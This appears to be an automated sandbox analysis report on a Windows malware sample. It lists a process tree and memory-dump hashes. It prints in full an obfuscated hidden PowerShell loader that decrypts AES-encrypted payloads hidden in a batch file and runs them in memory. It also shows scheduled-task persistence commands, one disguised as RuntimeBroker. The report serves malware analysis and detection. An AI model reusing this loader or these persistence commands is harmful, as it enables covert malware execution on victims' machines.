                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:07:10:59
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\net1.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\net1 file
                                                          Imagebase:0x7ff774490000
                                                          File size:183'808 bytes
                                                          MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:07:11:01
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:07:11:04
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_616_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_616.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:07:11:04
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:07:11:09
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\wscript.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_616.vbs"
                                                          Imagebase:0x7ff6ae140000
                                                          File size:170'496 bytes
                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:07:11:10
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\wscript.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_616.vbs"
                                                          Imagebase:0x7ff6ae140000
                                                          File size:170'496 bytes
                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:07:11:11
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_616.bat" "
                                                          Imagebase:0x7ff724670000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:13
                                                          Start time:07:11:11
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:14
                                                          Start time:07:11:11
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\net.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:net file
                                                          Imagebase:0x7ff77fed0000
                                                          File size:59'904 bytes
                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:07:11:11
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\net1.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\net1 file
                                                          Imagebase:0x7ff774490000
                                                          File size:183'808 bytes
                                                          MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:07:11:12
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\AppData\Roaming\startup_str_616.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:20
                                                          Start time:07:11:20
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "e45iasd" /tr "C:\Users\user\AppData\Local\Temp\e45iasd.exe"
                                                          Imagebase:0x7ff764ff0000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:21
                                                          Start time:07:11:20
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:22
                                                          Start time:07:11:23
                                                          Start date:22/08/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\e45iasd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Local\Temp\e45iasd.exe
                                                          Imagebase:0x7ff6d0730000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Has exited:false

                                                          Target ID:23
                                                          Start time:07:11:23
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:24
                                                          Start time:07:11:33
                                                          Start date:22/08/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\e45iasd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\e45iasd.exe"
                                                          Imagebase:0x7ff6d0730000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:25
                                                          Start time:07:11:33
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:26
                                                          Start time:07:11:41
                                                          Start date:22/08/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\e45iasd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\e45iasd.exe"
                                                          Imagebase:0x7ff6d0730000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:27
                                                          Start time:07:11:41
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Reset < >
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1564819322.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 88e6de7bb604619d89e57c1e9c4870351c0cf46e3bc70cdcc53d0bc93cb10497
                                                            • Instruction ID: d36b758b90c709bf9931126540d744dce87b79efbf2ed3c2a887b4de41d70464
                                                            • Opcode Fuzzy Hash: 88e6de7bb604619d89e57c1e9c4870351c0cf46e3bc70cdcc53d0bc93cb10497
                                                            • Instruction Fuzzy Hash: A6F18430918A4D8FEBA9DF28C8557E93BE2FF54350F04426EE84DC7291DB389945CB82
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1564819322.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e19536276fc622d39a65da91365b50f1c4d3a0a38d1ca1e2b9e5e997c8316ba3
                                                            • Instruction ID: f8acd2f43ea856e5cbe725a0eb2e2ea914de692be4c2f9cb6b0c017c802648f3
                                                            • Opcode Fuzzy Hash: e19536276fc622d39a65da91365b50f1c4d3a0a38d1ca1e2b9e5e997c8316ba3
                                                            • Instruction Fuzzy Hash: EAE18130908A4D8FEBA8DF28C8557E977D1FF54350F14426EE84DC7291DE789945CB82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1565520596.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .
                                                            • API String ID: 0-248832578
                                                            • Opcode ID: 7172c901f7ab5bd5cfa416b64a5a7a9e5cf502126c94d5835d80650cf9f58086
                                                            • Instruction ID: 27bc5b2618b4901cf482b855df537c1511f46a83e3465acacff6a30be67a9fd3
                                                            • Opcode Fuzzy Hash: 7172c901f7ab5bd5cfa416b64a5a7a9e5cf502126c94d5835d80650cf9f58086
                                                            • Instruction Fuzzy Hash: 1F02362290D7C95FE3579B3898566A1BFE0FF47260F0901FBD08ACB0A3E95A9C45C352
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1565520596.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: m
                                                            • API String ID: 0-3775001192
                                                            • Opcode ID: dede6579374bd57d334475e1ca73ebb1fdd1457aa9a136c872ff7444988b58c9
                                                            • Instruction ID: ef17080f7ccc2bb81880fb834e5974d75ad20a4689dd4d293f006293f2ae8021
                                                            • Opcode Fuzzy Hash: dede6579374bd57d334475e1ca73ebb1fdd1457aa9a136c872ff7444988b58c9
                                                            • Instruction Fuzzy Hash: 7EF1073190D7C94FD756DB2898155B4BFE1FF96260B0902FBD08EC71A3DA1AAC06C792
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1564819322.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: TM_H
                                                            • API String ID: 0-1481494851
                                                            • Opcode ID: b110160e3b36a3e16d2988f21a5d61c8c39cbf3f029c0821fdd92d6b912bdb21
                                                            • Instruction ID: 86688ad195fe92e5cbf8ce2825cb41efa806a63d9fdaacfc22dd3ecc20c07f33
                                                            • Opcode Fuzzy Hash: b110160e3b36a3e16d2988f21a5d61c8c39cbf3f029c0821fdd92d6b912bdb21
                                                            • Instruction Fuzzy Hash: CFD17230A5868A4FE789EB78C4157A977E2FF59390F5401BAD04DCB2E2DE2CAC41C751
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1565520596.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bba2067d36d7826f2f807709e31a4ee03d47abd1233b9ec9a9fe391a046cf901
                                                            • Instruction ID: 171dc657ca5a6f8561c31379eca0b102f578ef84c9902864c8786e5936e094fa
                                                            • Opcode Fuzzy Hash: bba2067d36d7826f2f807709e31a4ee03d47abd1233b9ec9a9fe391a046cf901
                                                            • Instruction Fuzzy Hash: CB424531E0DBC94FE7969B285855AB5BBE1FF96360B0801BBD04EC7193ED5AAC05C381
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1565520596.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: df2cd7aee144dd11caf3fa9c7367ee5340cbfb163bb20239deeb013609e3e47e
                                                            • Instruction ID: 87cf2a861284a73c83259f96378ad1f89009d1b89ffedd0a646b40813bf00184
                                                            • Opcode Fuzzy Hash: df2cd7aee144dd11caf3fa9c7367ee5340cbfb163bb20239deeb013609e3e47e
                                                            • Instruction Fuzzy Hash: EFE12131A0DBCA4FE7A69B6858512B4BBE1FF562A0B0801FBD04ECB1D3D959AC46C351
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1564819322.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0f7f7cef3904a45c975c5a2cced916ac75f29ef2d873d9be4493a80ad57d0993
                                                            • Instruction ID: f426128650079e13c905a68a4d2582956ab9ca1a0e69c1f3e3c1b8e1d51eba9e
                                                            • Opcode Fuzzy Hash: 0f7f7cef3904a45c975c5a2cced916ac75f29ef2d873d9be4493a80ad57d0993
                                                            • Instruction Fuzzy Hash: EF512320A1DA894FE34AEB6CA855675BBE1FF46350B1401FAD04DC7293DD28EC06C762
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1565520596.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cb5b4692ed45426b4e75c0a3183601ca211dc155f6cb09cb69c655f9ed1b97f2
                                                            • Instruction ID: 6510095e379391dfe5853098b6a65602ddeb6068c2f7938b39a71ef4f0b9071e
                                                            • Opcode Fuzzy Hash: cb5b4692ed45426b4e75c0a3183601ca211dc155f6cb09cb69c655f9ed1b97f2
                                                            • Instruction Fuzzy Hash: 08C12731E0CE4A4FE7A5DA2C58546B5B7E1FF99764B5802BED00EC3192DE6AEC01C381
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1564819322.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec31d9b940b4ef23cecf14a198b88cfc2e20e8d2e67edd455489b767b160bf6a
                                                            • Instruction ID: 0578e8bb585920b15569d9d5978ab2f7e2dd67972677d8c7b17d9a2b5d1b2581
                                                            • Opcode Fuzzy Hash: ec31d9b940b4ef23cecf14a198b88cfc2e20e8d2e67edd455489b767b160bf6a
                                                            • Instruction Fuzzy Hash: F0A1A31071DA8A4FE74ABB6C942176577D2EF9A390F6401BBE04DCB2D3DD1CAC428356
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1564819322.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ecc982e100aa8abc3f8b8494dbd490448402a179e8533d5d878fa1151413394c
                                                            • Instruction ID: df3139437220a3c05cf55c5af83cc05b1faa8373c5a2137cdf4aa9b5f8212be6
                                                            • Opcode Fuzzy Hash: ecc982e100aa8abc3f8b8494dbd490448402a179e8533d5d878fa1151413394c
                                                            • Instruction Fuzzy Hash: 2FB1A430A08A8D8FEB69DF28D8557E93BD1FF55350F04426EE84DC7292CE789945CB82
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1565520596.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5548f90a2275e444cb76c0c93aa5f0c683364e715eda696ce15b3408bb8db6c7
                                                            • Instruction ID: 3a0b98c7233e0be37b3675f22a836d6c9223ee53eb57fbcce3830a7ba88ec3ce
                                                            • Opcode Fuzzy Hash: 5548f90a2275e444cb76c0c93aa5f0c683364e715eda696ce15b3408bb8db6c7
                                                            • Instruction Fuzzy Hash: C621D331E0CA494FEBA9DA2C98552B9B7E1FF98394B54027ED04FD3292DE69EC018741
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1564819322.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 38873b19d089f4f4bef8c7a50898922719ec772276cfb57c4b4ecf82fc6c3bf9
                                                            • Instruction ID: 08a5998fd2d6718cdbd7f84f7d023fb3d94a81d3ba0229ea5ac73ba5ede8598c
                                                            • Opcode Fuzzy Hash: 38873b19d089f4f4bef8c7a50898922719ec772276cfb57c4b4ecf82fc6c3bf9
                                                            • Instruction Fuzzy Hash: 5D31073095864ECEFBB8EF25CC5ABF936A6FF41399F400139D40E86196CA386D85CB11
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1565520596.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4fb4b657caea58129d8d804317c325a4ae9eff48cf5d61550de289fdae2aa753
                                                            • Instruction ID: 18328aa151a3faf46bc04f7ffbf34128443e08cb3f032973fb23173b5479d621
                                                            • Opcode Fuzzy Hash: 4fb4b657caea58129d8d804317c325a4ae9eff48cf5d61550de289fdae2aa753
                                                            • Instruction Fuzzy Hash: 2911A221F1DE4A0BFAAA975C182137992D2EF952A0B9811BAD50EC72C7EC499C119245
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1565520596.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d299f6493713c1abb1ea6ea9b384afff23fb53c0f694ca86c934c2abfa107657
                                                            • Instruction ID: be2f089afc3a960f65ace6998764bde936b0199ccfc06dbd9d0c45f094664b88
                                                            • Opcode Fuzzy Hash: d299f6493713c1abb1ea6ea9b384afff23fb53c0f694ca86c934c2abfa107657
                                                            • Instruction Fuzzy Hash: 35110822F0DA9A0BF69B975C142177592C2EF897A0F9800BAD40EC31C7ED0DAC018241
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1564819322.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d6953e77ffead2d3381b11e48d5414f0e4abd3ee007726cde7a779ef7e14603f
                                                            • Instruction ID: 7048869521c1de18792688d6b4d7999561f99ef16c7c9e64030e2104b7937f3a
                                                            • Opcode Fuzzy Hash: d6953e77ffead2d3381b11e48d5414f0e4abd3ee007726cde7a779ef7e14603f
                                                            • Instruction Fuzzy Hash: DC01677115CB0C8FD748EF4CE451AA5B7E0FB95364F10056DE58AC3651D736E881CB46
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1565520596.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c6a3321362a1d19e68a2bbd8cd10e8e289ebfc15e221579e34bdf9bb402fec63
                                                            • Instruction ID: 0b2a5a4f52caf0cdef8efa4dea1a8947cfefc775b481d1031b1f7de1841a144f
                                                            • Opcode Fuzzy Hash: c6a3321362a1d19e68a2bbd8cd10e8e289ebfc15e221579e34bdf9bb402fec63
                                                            • Instruction Fuzzy Hash: DFF09032B1CA084FA798DA1C98451BAB3E2FB99126745417FD18FC7562DA2298028700
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1564819322.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8d88204f4171ac09029190e9b56be8c6979f3e90aef7e39097de7fc36a500121
                                                            • Instruction ID: a84adfcd9260462ac084e6d13eb892928e9f2872d230a7288c7dc85bcd3137aa
                                                            • Opcode Fuzzy Hash: 8d88204f4171ac09029190e9b56be8c6979f3e90aef7e39097de7fc36a500121
                                                            • Instruction Fuzzy Hash: 0AD02B11C1CE950BC7295278380E4E02EA09F1612074B02EBE018C75D7E54E4C85C3D1
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1564819322.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7156ca663e2c5092032a2f3194f38a79ede642910510c2f1b34e83629570ff64
                                                            • Instruction ID: eceda0f093819b444b5f91863a2bf226d88851b9c74bc1734633b34484794826
                                                            • Opcode Fuzzy Hash: 7156ca663e2c5092032a2f3194f38a79ede642910510c2f1b34e83629570ff64
                                                            • Instruction Fuzzy Hash: 41D1A330918A898FEB68DF28C8557E97BD2FF55350F04426EE84DC7291CF78A845CB82
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1431529891.00007FF886B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886B3D000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 380d20f1c162c5e13ec5afd56cce8347c7b81462b99bf0f765983b5ee01a3f18
                                                            • Instruction ID: 5a0c254ad0cac983da6bcd4e6a499f583d9ac113e2810c7d0edaf591afad7685
                                                            • Opcode Fuzzy Hash: 380d20f1c162c5e13ec5afd56cce8347c7b81462b99bf0f765983b5ee01a3f18
                                                            • Instruction Fuzzy Hash: 8B41233180DBC68FE3569B38A8458523FF0FF56364B1905EFD088CB0A3D628AC46C792
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.1432019030.00007FF886C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C50000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
